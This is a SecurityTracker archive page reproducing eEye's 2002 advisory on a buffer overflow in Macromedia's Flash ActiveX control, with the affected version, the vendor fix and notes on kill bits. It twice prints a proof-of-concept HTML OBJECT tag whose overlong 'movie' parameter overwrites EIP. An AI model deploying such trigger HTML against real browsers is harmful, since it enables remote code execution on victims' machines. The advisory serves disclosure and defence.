Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
|
|
|
Want to learn about SecurityTracker? We've got answers to frequently asked questions right here
|
|
|
|
|
|
|
|
|
|
|
Macromedia Flash OCX Activex Object for Internet Explorer Contains Buffer Overflow That Allows Malicious HTML to Execute Arbitrary Code on the Victim's Computer
|
|
SecurityTracker Alert ID: 1004214 |
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: May 3 2002
|
Impact: Execution of arbitrary code via network
|
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
|
Advisory: eEye Digital Security
|
Version(s): version 6 revision 23
|
Description: A vulnerability was reported in Macromedia's Flash OCX signed object, an Activex object installed with Internet Explorer. A remote
user could execute arbitrary code on a user's browser when malicious HTML is loaded by the Internet Explorer browser.
eEye Digital Security reported that the Flash.ocx Activex object does not perform proper bounds checking on the "movie" parameter.
It is reported that a remote user can create malicious HTML that, when loaded by the target (victim) user's Internet Explorer browser,
would cause arbitrary code to be executed on the target user's computer. The malicious HTML can apparently be distributed by e-mail
or web.
A demonstration exploit example is provided below:
<OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000">
<PARAM
NAME=movie VALUE="http://[targethost]/notthere.swf?AAA[...unstated, but fixed number]XXXXXXXX">
</OBJECT>
In this example, the
"X" values will overwrite the EIP register.
Users should be aware that the OCX is digitally signed by Macromedia.
|
Impact: A remote user could create malicious HTML that will, when loaded by a target user, will cause arbitrary code to be executed on the target user's computer with the privileges of the target user.
|
Solution: The vendor has reportedly released a fixed version (6,0,29,0), available at:
http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash
|
Vendor URL: www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash (Links to External Site)
|
Cause: Boundary error
|
Underlying OS: Windows (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Date: Thu, 02 May 2002 20:55:43 -0400
Subject: Macromedia Flash Activex Buffer overflow
|
Macromedia Flash Activex Buffer overflow
Release Date:
05/02/2002
Severity:
High (Remote code execution)
Systems Affected:
Systems with Flash Activex Ocx Version 6, revision 23
(Possibly older versions)
This includes most installations of Windows.
Description:
All users of Internet Explorer are potentially affected because this is
a Macromedia signed ocx. We advise them to upgrade their flash version
immediately to version 6, revision 29 (see the Vendor Status section
below).
This is an unusual advisory in a number of ways.
One, it was found while investigating an access error encountered during
normal web surfing, which was suspicious. Within a few hours we had
confirmed on multiple Operating Systems that this was an exploitable
condition that overwrote EIP.
Two, while we tested on these systems with the latest install from the
vendor's site, when we contacted the vendor they informed us that they
had just released a new build this same day which already fixed the
problem. They asked us to confirm this. We tried the link they gave us
and it did indeed fix the problem and was a new build. Testing the link
later that night confirmed the link we used to install the ocx now had
the fixed, latest version.
In this, we congratulate Macromedia for: finding the bug, fixing it, and
releasing the build in a timely fashion. This truly shows that they are
dedicated to security just as they have stated they are.
However, because there is a signed flash ocx out there which has been
downloaded by an untold number of people, and potentially could still be
used in an exploit scenario against those without the latest ocx we felt
the need to release this advisory.
Furthermore, this issue was found in the wild, and it is not safe to
assume it could not be found by others with malicious intent. Nor do we
believe it is safe to assume this has not been found by users with
malicious intent.
A vulnerability in the parameter handling to the Flash OCX, which could
lead to the execution of attacker supplied code via email, web or any
other avenue in which Internet Explorer is used to display html that an
attacker can supply. This includes software which uses the web browser
activex.
Example:
<OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000">
<PARAM NAME=movie
VALUE="http://www.notthere8979873.com/notthere.swf?AAA[...unstated, but
fixed number]XXXXXXXX">
</OBJECT>
Where X overwrites the EIP consistently across Windows platforms.
Technical Description:
Flash.ocx is an activex object installed with Internet Explorer, and is
used to display flash objects on the web.
Proper bounds checking is not in place in the "movie" parameter which
overwrites EIP at an unsaid, but fixed number of bytes across Windows
platforms.
Because the ocx is signed by Macromedia: there is a chance the older
activex could be used against people without flash; people whom have an
older version of flash not affected may be forced to "upgrade" to the
affected version; and, of course, those with the affected versions need
to upgrade lest the exploit works out of the box on them.
There has been considerable debate about legacy activex objects which
have exploits within them. In general, if someone uses the codebase
parameter to point to an affected version of the activex, the system
will first try and grab the activex from Microsoft's activex store on
the web. Then, it will try the activex specified in the codebase tag by
the malicious user.
We do not believe this method is fool-proof.
We do not believe the method is full proof because of the potential of
the activex storehouse check failing and because of the potentiality for
the activex to be called by other methods. (At least a few potential
other methods are in the RFC for applets and objects).
However, the other option of setting the "kill bit" for the affected
activex and reassigning the fixed activex version with a new classid is
only a suggestion we will make in this case. We do not believe it is
necessarily mandatory.
Risk should be mitigated to a satisfactory level by users upgrading to
the new ocx.
Vendor Status:
Visit Macromedia's site to get the latest Flash ocx to eliminate these
issues.
http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash
Credit:
Drew Copley
Greetings:
Fat code: presented by Yahoo and Weight Watchers. KROQ, and corn dog
manufacturers world-wide.
Copyright (c) 1998-2002 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express
consent of eEye. If you wish to reprint the whole or any part of this
alert in any other medium excluding electronic medium, please e-mail
alert@eEye.com for permission.
Disclaimer
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO warranties with regard to this information. In no event shall the
author be liable for any damages whatsoever arising out of or in
connection with the use or spread of this information. Any use of this
information is at the user's own risk.
Feedback
Please send suggestions, updates, and comments to:
eEye Digital Security
http://www.eEye.com
info@eEye.com
|
|
Go to the Top of This SecurityTracker Archive Page
|
